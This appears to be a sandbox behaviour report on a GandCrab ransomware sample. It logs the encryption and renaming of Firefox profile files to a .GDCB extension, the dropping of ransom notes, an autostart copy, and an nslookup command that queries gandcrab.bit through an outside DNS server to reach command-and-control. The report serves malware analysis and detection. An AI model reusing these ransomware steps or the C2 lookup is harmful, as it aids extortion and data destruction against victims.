File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info, size = 1048576, size_out = 116 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info, size = 128 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gmpopenh264.info.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, size = 1048576, size_out = 479 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, size = 480 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json, size = 1048576, size_out = 349 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json, size = 352 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\manifest.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db, size = 1048576, size_out = 16384 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db, size = 16384 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite, size = 1048576 True 1
Fn
Data
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite, size = 1048576, size_out = 0 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\minidumps\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\minidumps\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite, size = 1048576, size_out = 98304 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite, size = 98304 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite.GDCB True 1
Fn
For performance reasons, the remaining 171 entries are omitted.
The remaining entries can be found in glog.xml.
Process #2: nslookup.exe
(Host: 8, Network: 18)
+
Information Value
ID #2
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup gandcrab.bit a.dnspod.com
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:42, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:09:44
OS Process Information
+
Information Value
PID 0xdf0
Parent PID 0x478 (c:\users\ciihmnxmn6ps\desktop\bi35.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00013d92 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x DE8
0x E50
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000950000 0x00950000 0x0096ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000950000 0x00950000 0x0095ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000960000 0x00960000 0x00963fff Private Memory Readable, Writable True True False
private_0x0000000000970000 0x00970000 0x00971fff Private Memory Readable, Writable True True False
nslookup.exe.mui 0x00970000 0x00974fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000000980000 0x00980000 0x00993fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000009a0000 0x009a0000 0x009dffff Private Memory Readable, Writable True True False
private_0x00000000009e0000 0x009e0000 0x00a1ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000a20000 0x00a20000 0x00a23fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000a30000 0x00a30000 0x00a30fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000a40000 0x00a40000 0x00a41fff Private Memory Readable, Writable True True False
locale.nls 0x00a50000 0x00b0dfff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000000b10000 0x00b10000 0x00b4ffff Private Memory Readable, Writable True True False
private_0x0000000000b50000 0x00b50000 0x00b8ffff Private Memory Readable, Writable True True False
imm32.dll 0x00b90000 0x00bb9fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000000b90000 0x00b90000 0x00b90fff Private Memory Readable, Writable True True False
private_0x0000000000ba0000 0x00ba0000 0x00ba0fff Private Memory Readable, Writable True True False
private_0x0000000000be0000 0x00be0000 0x00beffff Private Memory Readable, Writable True True False
private_0x0000000000cc0000 0x00cc0000 0x00dbffff Private Memory Readable, Writable True True False
pagefile_0x0000000000dc0000 0x00dc0000 0x00f47fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000f60000 0x00f60000 0x00f6ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000f70000 0x00f70000 0x010f0fff Pagefile Backed Memory Readable True False False
  • Region Actions
nslookup.exe 0x01360000 0x01376fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000001380000 0x01380000 0x0537ffff Pagefile Backed Memory - True False False
  • Region Actions
pagefile_0x0000000005380000 0x05380000 0x0677ffff Pagefile Backed Memory Readable True False False
  • Region Actions
wow64cpu.dll 0x5c9f0000 0x5c9f7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x5ca00000 0x5ca72fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x5ca80000 0x5cacefff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winrnr.dll 0x73010000 0x7301afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nlaapi.dll 0x73020000 0x73032fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pnrpnsp.dll 0x73040000 0x73055fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
napinsp.dll 0x73060000 0x73071fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fwpuclnt.dll 0x73080000 0x730c5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rasadhlp.dll 0x730d0000 0x730d7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dnsapi.dll 0x730e0000 0x73163fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mswsock.dll 0x73170000 0x731bdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x73270000 0x73277fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x73280000 0x732affff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcrypt.dll 0x73410000 0x7342afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74230000 0x74288fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74290000 0x74299fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x742a0000 0x742bdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x74500000 0x7463ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x74730000 0x7475afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x75b80000 0x75c3dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x75f20000 0x76095fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x760a0000 0x760e2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x76470000 0x764cbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x769b0000 0x76afcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x76bc0000 0x76caffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x77040000 0x77046fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x77070000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77190000 0x77308fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x000000007eaa0000 0x7eaa0000 0x7eb9ffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007eba0000 0x7eba0000 0x7ebc2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007ebc3000 0x7ebc3000 0x7ebc3fff Private Memory Readable, Writable True True False
private_0x000000007ebc9000 0x7ebc9000 0x7ebcbfff Private Memory Readable, Writable True True False
private_0x000000007ebcc000 0x7ebcc000 0x7ebcefff Private Memory Readable, Writable True True False
private_0x000000007ebcf000 0x7ebcf000 0x7ebcffff Private Memory Readable, Writable True True False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7dfb3d30ffff Private Memory Readable True False False
  • Region Actions
pagefile_0x00007dfb3d310000 0x7dfb3d310000 0x7ffb3d30ffff Pagefile Backed Memory - True False False
  • Region Actions
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ffb3d4d2000 0x7ffb3d4d2000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
Threads
Thread 0xde8
(Host: 8, Network: 18)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x1360000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = a.dnspod.com, address_out = 101.226.79.205, 112.90.141.215 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 101.226.79.205, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 101.226.79.205, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 124 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 101.226.79.205, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 100 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #4: tubcvd.exe
(Host: 3091, Network: 33)
+
Information Value
ID #4
File Name c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe
Command Line "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:58, Reason: Autostart
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:08:28
OS Process Information
+
Information Value
PID 0x79c
Parent PID 0x480 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (USE_FOR_DENY_ONLY)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 2E8
0x 9FC
0x 7AC
0x 7A8
0x 7B0
0x 7A0
0x 824
0x 820
0x 75C
0x 814
0x 81C
0x 838
0x 804
0x 610
0x BF0
0x B80
0x 900
0x BEC
0x B5C
0x 7F0
0x AD4
0x AD8
0x 8CC
0x 2CC
0x 2E0
0x 77C
0x 868
0x 7FC
0x 87C
0x 7EC
0x 4B8
0x AA8
0x AB4
0x B68
0x 950
0x B98
0x BB4
0x A74
0x BD8
0x A5C
0x 15C
0x 1A4
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000001e0000 0x001e0000 0x0021ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000220000 0x00220000 0x00220fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000230000 0x00230000 0x00241fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000230000 0x00230000 0x00230fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000240000 0x00240000 0x00240fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000270000 0x00270000 0x00273fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000280000 0x00280000 0x00283fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000390000 0x00390000 0x00395fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000390000 0x00390000 0x00390fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x00000000003a0000 0x003a0000 0x003a0fff Pagefile Backed Memory Readable True False False
  • Region Actions
tubcvd.exe 0x00400000 0x00426fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
locale.nls 0x00430000 0x004edfff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000004f0000 0x004f0000 0x005effff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000780000 0x00780000 0x0086ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000780000 0x00780000 0x00837fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000860000 0x00860000 0x0086ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000870000 0x00870000 0x0087ffff Private Memory Readable, Writable True False False
  • Region Actions
